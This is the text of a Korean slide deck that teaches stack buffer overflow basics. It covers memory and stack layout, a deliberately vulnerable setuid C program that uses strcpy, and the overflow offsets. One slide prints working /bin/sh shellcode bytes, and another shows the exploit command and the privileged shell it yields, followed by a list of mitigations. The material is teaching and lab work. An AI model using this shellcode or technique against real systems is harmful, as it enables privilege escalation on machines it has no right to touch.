Basic of Buffer Over Flow

S.S.G 방승원

Agenda

• Introduction• Memory Structure• Stack Structure while Example• Target Program• Ready & Attack• Attack & Security• Application of Overflow

Introduction

• Overflow ?? –넘치다 , 넘쳐 흐르다 ; 범람하다 ;– < 용기 등이 > 가득 차다 , 넘치다

• Buffer Over Flow ??–정해진 메모리보다 많은 데이터를 입력 받아

특정 영역을 덮음으로써 프로그램 흐름을 바꿔 공격자가 원하는 코드를 실행하는 공격

–<Phrack Magazine 49-14>, Aleph One

Memory Structure

• TEXT : Program Code• DATA : Static Variable Global Variable• HEAP : Dynamic Allocation• STACK Dynamic Varbiable Local Variable

TEXTTEXT

DATADATA

HEAPHEAP

STACKSTACK

LOW

HIGH

Stack Structure

• LIFO(Last In First Out)

• PUSH

• POP

• SP(Stack Pointer)

• BP(Base Pointer)

STACKSTACK

Memory LOW(0x08048000)

MemoryHIGH(0xbfffffff)

Stack HIGH

PUSH

PUSH

Stack LOW BP

SP

POPPOP

Example Program

#include <stdio.h>

void func(int a, int b, int c){

int buf1;char buf2[16];

}void main(){

func(1, 2, 3);printf(“Hello, World!\n”);

}

Example Program

#include <stdio.h>

void func(int a, int b, int c){

int buf1;char buf2[16];

}void main(){

func(1, 2, 3);printf(“Hello, World!\n”);

}

STACKSTACK

Memory LOW(0x08048000)

MemoryHIGH(0xbfffffff)

Stack HIGH

Stack LOW EB

P

ESP

Example Program

main: pushl $3 pushl $2 pushl $1 call func addl $16, %esp

func: pushl %ebp movl %esp, %ebp subl $40, %esp leave (pop %ebp ret

STACKSTACK

Memory LOW(0x08048000)

MemoryHIGH(0xbfffffff)

Stack HIGH

Stack LOW

EBP

ESP

Target Program#include <stdio.h>#include <string.h>

void func(char *str){

char buf[64];strcpy(buf, str);

}

void main(int argc, char *argv[])

{func(argv[1]);printf(“Hello, World\n”);

}

• argc, argv프로그램을 실행 할 때 인자를 입력받는 방법ex) ./target bang 1234argv = 3;argv[0] = “target”;argv[1] = “bang”;argv[2] = “1234”;

• strcpy(dest, src)src 가 가르키는 문자열을 dest로 복사* 크기 제한이 없어 overflow 취약점 발생

Target Program

• Setuid Bit 가 걸려있음Set User ID Bit(number – 4000)

$ chmod 4755 target (or chmod u+s)-rwsr-xr-x 1 level1 level1 target 어떤 사용자든지 이 target 을 실행할 땐

level1 유저권한을 갖게 됨ex) passwd

• Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5

Target Program

• Let’s Run program With a lot of ‘A’ Character!!!

• Result : Segmentation Fault

• Why??

Target Program

#include <stdio.h>#include <string.h>

void func(char *str){

char buf[64];strcpy(buf, str);

}

void main(int argc, char *argv[])

{func(argv[1]);printf(“Hello, World\n”);

}

STACKSTACK

Memory LOW(0x08048000)

MemoryHIGH(0xbfffffff)

Stack HIGH

Stack LOW

EBP

ESP

Target Program

STACKSTACK

Memory LOW

MemoryHIGH

Stack HIGH

Stack LOW

$ ./target `perl -e 'print "A"x71'`

[ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ]

64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes

Normal

Normal

Target Program

STACKSTACK

Memory LOW

MemoryHIGH

Stack HIGH

Stack LOW

$ ./target `perl -e 'print "A"x72'`

[ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ]

64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes

Overflow

Overflow

Target Program

STACKSTACK

Memory LOW

MemoryHIGH

Stack HIGH

Stack LOW

$ ./target `perl -e 'print "A"x80'`

[ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ]

64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes

RealOverflo

w

RealOverflo

w

Target Programfunc: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave retmain: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func addl $16, %esp subl $12, %esp

STACKSTACK

Memory LOW(0x08048000)

MemoryHIGH(0xbfffffff)

Stack HIGH

Stack LOW

EBP

ESP

Target Programfunc: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave retmain: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func addl $16, %esp subl $12, %esp

STACKSTACK

Memory LOW(0x08048000)

MemoryHIGH(0xbfffffff)

Stack HIGH

Stack LOW

EBP

ESP

0x41414141(??)

Shell Code• 쉘을 실행해주는 코드#include <unistd.h>void main(){

char *shell[2];

setreuid(3001, 3001);shell[0] = "/bin/sh";shell[1] = NULL;

execve(shell[0], shell, NULL);}

어셈코드

"\x31\xc0\x31\xdb\x31\xc9\x66\xbb”“\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46”“\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88””\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3””\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31””\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Attack Ready

• Segmentation Fault 확인• 쉘코드 제작• 쉘코드를 버퍼에다 넣었을 때 , 그 버퍼의

주소를 찾아야 됨• But, 버퍼의 주소를 추측하기가 어려움• 그러므로 쉘 환경 변수에 쉘코드를 넣어서

사용하여 쉘코드의 주소를 계산해 주는 Eggshell 사용

Attack

bash-2.05b$ ./egg 512 200Using address: 0xbffffa60bash-2.05b$ ./target `perl -e 'print

"A"x76';(printf "\x60\xfa\xff\xbf")`sh-2.05b$ iduid=3001(level1) gid=1000(guest)

groups=1000(guest)sh-2.05b$

Attack V.S Security

• Non-executable Stack Return Into Libc Omega Project

• Stack Guard and Stack Shield Bypass Stack Guard and Stack Shield

• Random Stacks• Exec Shield( 커널수준 )

Exec Shield 회피• strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf() 등 사용 자제 -> strncpy() strncat()

사용• And so on………

Application of Overflow

• Windows, Unix, Linux, Mac• Local, Remote• Web -> ActiveX• Heap Overflow• Integer Overflow• Frame Pointer Overwrite